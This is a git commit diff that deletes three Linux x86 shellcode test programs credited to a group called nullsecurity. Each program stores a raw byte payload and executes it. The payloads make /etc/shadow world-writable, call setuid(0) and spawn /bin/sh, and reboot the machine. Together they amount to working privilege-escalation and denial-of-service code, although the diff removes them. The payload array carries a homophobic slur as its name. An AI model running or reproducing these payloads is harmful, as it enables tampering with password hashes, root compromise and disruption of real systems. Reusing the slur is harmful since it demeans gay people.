remove source files.

This commit is contained in:
Levon 'noptrix' Kayan
2026-04-21 14:56:23 +03:00
parent a3bd04ab19
commit 29aef236dd
394 changed files with 0 additions and 65054 deletions
@@ -1,52 +0,0 @@
/*******************************************************************************
* *
* ~ .__ °.__ 0 o ^ .__ °__ `´ *
* °____) __ __| | | °| ______°____ 0 ____ __ _________|__|/ |_ ___.__. *
* / \| | °\ |°| | °/ ___// __ \_/ ___\| | °\_ __ \ o\ __< | | *
* | o°| \ | / |_| |__\___ \\ ___/\ °\___| o| /| | \/ || |° \___ O| *
* |___| /____/|____/____/____ °>\___ >\___ >____/ |__|° |__||__| / ____| *
* `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/ ``´```´```´´´´`´``0_o\/´´`´´ *
* *
* chmod_linux.c *
* *
* DATE *
* xx/xx/2008 *
* *
* OS *
* Linux *
* *
* ARCH *
* x86 *
* *
* TYPE *
* chmod("/etc/shadow", 666); exit(); *
* *
* SIZE *
* 32 bytes *
* *
* AUTHOR *
* noptrix - http://www.nullsecurity.net/ *
* *
******************************************************************************/
#include <stdio.h>
char gaycode[] =
"\x31\xc9\x51\xb1\xb6\x68\x61\x64\x6f\x77\x68\x63\x2f\x73\x68\x68\x2f\x2f"
"\x65\x74\x89\xe3\x6a\x0f\x58\xcd\x80\x6a\x01\x58\xcd\x80";
int main()
{
void (*f)();
f = (void *) gaycode;
printf("%d\n", strlen(gaycode));
f();
return 1337;
}
@@ -1,55 +0,0 @@
/*******************************************************************************
* *
* ~ .__ °.__ 0 o ^ .__ °__ `´ *
* °____) __ __| | | °| ______°____ 0 ____ __ _________|__|/ |_ ___.__. *
* / \| | °\ |°| | °/ ___// __ \_/ ___\| | °\_ __ \ o\ __< | | *
* | o°| \ | / |_| |__\___ \\ ___/\ °\___| o| /| | \/ || |° \___ O| *
* |___| /____/|____/____/____ °>\___ >\___ >____/ |__|° |__||__| / ____| *
* `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/ ``´```´```´´´´`´``0_o\/´´`´´ *
* *
* execve_linux.c *
* *
* DATE *
* xx/xx/2008 *
* *
* OS *
* Linux *
* *
* ARCH *
* x86 *
* *
* TYPE *
* setuid(0); execve("/bin/sh", foobar, NULL); *
* *
* SIZE *
* 47 bytes *
* *
* AUTHOR *
* noptrix - http://www.nullsecurity.net/ *
* *
******************************************************************************/
#include <stdio.h>
#include <string.h>
unsigned char gaycode[] =
"\xeb\x21\x31\xdb\x8d\x43\x17\xcd\x80\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89"
"\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8"
"\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
void (*f)();
f = (void *) gaycode;
printf("%d\n", strlen(gaycode));
f();
return 1337;
}
@@ -1,51 +0,0 @@
/*******************************************************************************
* *
* ~ .__ °.__ 0 o ^ .__ °__ `´ *
* °____) __ __| | | °| ______°____ 0 ____ __ _________|__|/ |_ ___.__. *
* / \| | °\ |°| | °/ ___// __ \_/ ___\| | °\_ __ \ o\ __< | | *
* | o°| \ | / |_| |__\___ \\ ___/\ °\___| o| /| | \/ || |° \___ O| *
* |___| /____/|____/____/____ °>\___ >\___ >____/ |__|° |__||__| / ____| *
* `´´`´\/´`nullsecurity team`´\/`´´`´\/`´``´\/ ``´```´```´´´´`´``0_o\/´´`´´ *
* *
* reboot_linux.c *
* *
* DATE *
* xx/xx/2008 *
* *
* OS *
* Linux *
* *
* ARCH *
* x86 *
* *
* TYPE *
* reboot(0x1234567); *
* *
* SIZE *
* 21 bytes *
* *
* AUTHOR *
* noptrix - http://www.nullsecurity.net/ *
* *
******************************************************************************/
#include <stdio.h>
unsigned char gaycode[] =
"\x31\xc0\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xb0"
"\x58\xcd\x80";
int main()
{
void (*f)();
f = (void *) gaycode;
printf("%d\n", strlen(gaycode));
f();
return 1337;
}